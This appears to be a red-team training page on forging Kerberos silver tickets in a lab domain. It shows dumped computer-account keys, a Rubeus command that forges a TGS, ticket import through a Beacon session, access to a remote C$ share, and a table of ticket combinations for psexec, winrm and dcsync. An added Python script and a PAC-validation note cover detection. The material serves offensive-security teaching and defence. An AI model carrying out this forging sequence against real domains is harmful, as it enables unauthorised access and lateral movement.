Silver Tickets

A "silver ticket" is a forged TGS, signed and encrypted using the secret material (RC4/AES keys) of a computer account. With those keys you can forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence. By default, computer account passwords change every 30 days, at which point you must re-obtain the new secrets to continue forging silver tickets. Both silver and golden (coming up next) tickets are forged offline, so they can be generated on your own machine and imported into your Beacon session for use.

Let's say we dumped Kerberos keys from Workstation 1 from a SYSTEM Beacon.

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WKSTN-1$
Domain            : DEV
Logon Server      : (null)
Logon Time        : 9/9/2022 9:37:22 AM
SID               : S-1-5-20

	 * Username : wkstn-1$
	 * Domain   : DEV.CYBERBOTIC.IO
	 * Password : (null)
	 * Key List :
	   aes256_hmac       c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7
	   rc4_hmac_nt       fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_old      fc0c8a61a83bafdffc587956d0020398
	   rc4_md4           fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_nt_exp   fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_old_exp  fc0c8a61a83bafdffc587956d0020398


On your Windows attacking machine, use Rubeus to forge a TGS for nlamb and the cifs service.

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

[*] Action: Build TGS

[*] Building PAC

[*] Domain         : DEV.CYBERBOTIC.IO (DEV)
[*] SID            : S-1-5-21-569305411-121244042-2357301523
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : C9E598CD2A9B08FE31936F2C1846A8365D85147F75B8000CBC90E3C9DE50FCC7
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : C9E598CD2A9B08FE31936F2C1846A8365D85147F75B8000CBC90E3C9DE50FCC7
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : cifs
[*] Target         : wkstn-1.dev.cyberbotic.io

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'nlamb' to 'cifs/wkstn-1.dev.cyberbotic.io'

[*] AuthTime       : 9/9/2022 10:49:41 AM
[*] StartTime      : 9/9/2022 10:49:41 AM
[*] EndTime        : 9/9/2022 8:49:41 PM
[*] RenewTill      : 9/16/2022 10:49:41 AM

[*] base64(ticket.kirbi):

      doIFXD[...]MuaW8=


Then import the ticket.

beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[-] could not open \\wkstn-1.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=

[*] Using DEV\nlamb:FakePass

[*] Showing process : False
[*] Username        : nlamb
[*] Domain          : DEV
[*] Password        : FakePass
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 5668
[+] Ticket successfully imported!
[+] LUID            : 0x423091

beacon> steal_token 5668

beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[*] Listing: \\wkstn-1.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/16/2022 08:17:30   $Recycle.Bin
          dir     08/15/2022 22:22:31   $WinREAgent
          dir     01/27/2022 18:18:49   Documents and Settings
          dir     12/07/2019 09:14:52   PerfLogs
          dir     08/22/2022 00:15:03   Program Files
          dir     10/06/2021 13:57:25   Program Files (x86)
          dir     09/08/2022 13:58:46   ProgramData
          dir     08/17/2022 17:52:54   Recovery
          dir     09/06/2022 08:17:28   System Volume Information
          dir     08/16/2022 08:15:58   Users
          dir     09/09/2022 10:38:50   Windows
 8kb      fil     09/09/2022 08:37:00   DumpStack.log.tmp
 796mb    fil     09/09/2022 08:37:00   hiberfil.sys
 704mb    fil     09/09/2022 08:37:00   pagefile.sys
 16mb     fil     09/09/2022 08:37:00   swapfile.sys
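Because the ticket above was built and signed locally with the computer account key, the KDC never saw a TGS-REQ for it, so on the DCs there is no Event 4769 for nlamb to WKSTN-1$ even though WKSTN-1 logs a Kerberos network logon (Event 4624, logon type 3). The following is an added example, not code from the course page, that correlates constructed sample events and flags host logons with no preceding service ticket request; it assumes a consolidated event list with the fields shown and that the Security logs of every DC are collected (a missing DC log produces false positives).

```python
from datetime import datetime, timedelta

# Constructed sample events (not taken from the page). 4769 comes from the
# DC's Security log, 4624 from the target workstation's Security log.
EVENTS = [
    {"host": "DC-2", "id": 4769, "time": "2022-09-09 09:40:00",
     "user": "bfarmer@DEV.CYBERBOTIC.IO", "service": "WKSTN-1$"},
    {"host": "WKSTN-1", "id": 4624, "time": "2022-09-09 09:40:02",
     "user": "bfarmer", "logon_type": 3, "auth": "Kerberos"},
    # Silver ticket scenario: nlamb logs on to WKSTN-1 over Kerberos,
    # but no DC ever issued a service ticket for nlamb to WKSTN-1$.
    {"host": "WKSTN-1", "id": 4624, "time": "2022-09-09 10:50:10",
     "user": "nlamb", "logon_type": 3, "auth": "Kerberos"},
    # NTLM logon: not Kerberos, so no 4769 is expected and it is ignored.
    {"host": "WKSTN-1", "id": 4624, "time": "2022-09-09 10:51:00",
     "user": "svc_backup", "logon_type": 3, "auth": "NTLM"},
]

TICKET_LIFETIME = timedelta(hours=10)  # default maximum service ticket age


def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def find_unrequested_kerberos_logons(events, lifetime=TICKET_LIFETIME):
    """Return (host, user, time) for every Kerberos network logon (4624,
    type 3) that has no 4769 for the same user to the host's computer
    account within one ticket lifetime before the logon. A cached ticket
    can legitimately be hours old, hence the lifetime-sized window."""
    tgs_requests = [e for e in events if e["id"] == 4769]
    flagged = []
    for e in events:
        if e["id"] != 4624 or e.get("auth") != "Kerberos" or e.get("logon_type") != 3:
            continue
        logon_time = parse(e["time"])
        spn_account = e["host"].upper() + "$"  # service account of the host
        matched = any(
            r["user"].split("@")[0].lower() == e["user"].lower()
            and r["service"].upper() == spn_account
            and logon_time - lifetime <= parse(r["time"]) <= logon_time
            for r in tgs_requests)
        if not matched:
            flagged.append((e["host"], e["user"], e["time"]))
    return flagged


if __name__ == "__main__":
    for hit in find_unrequested_kerberos_logons(EVENTS):
        print("possible forged service ticket (no 4769 on any DC):", hit)
```

Enabling PAC validation on the host (it then asks the DC to verify the PAC signature) is the configuration-side complement to this log correlation.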


Here are some useful ticket combinations:

 Technique            Required Service Tickets
 ---------            ------------------------
 psexec               CIFS
 winrm                HOST & HTTP
 dcsync (DCs only)    LDAP
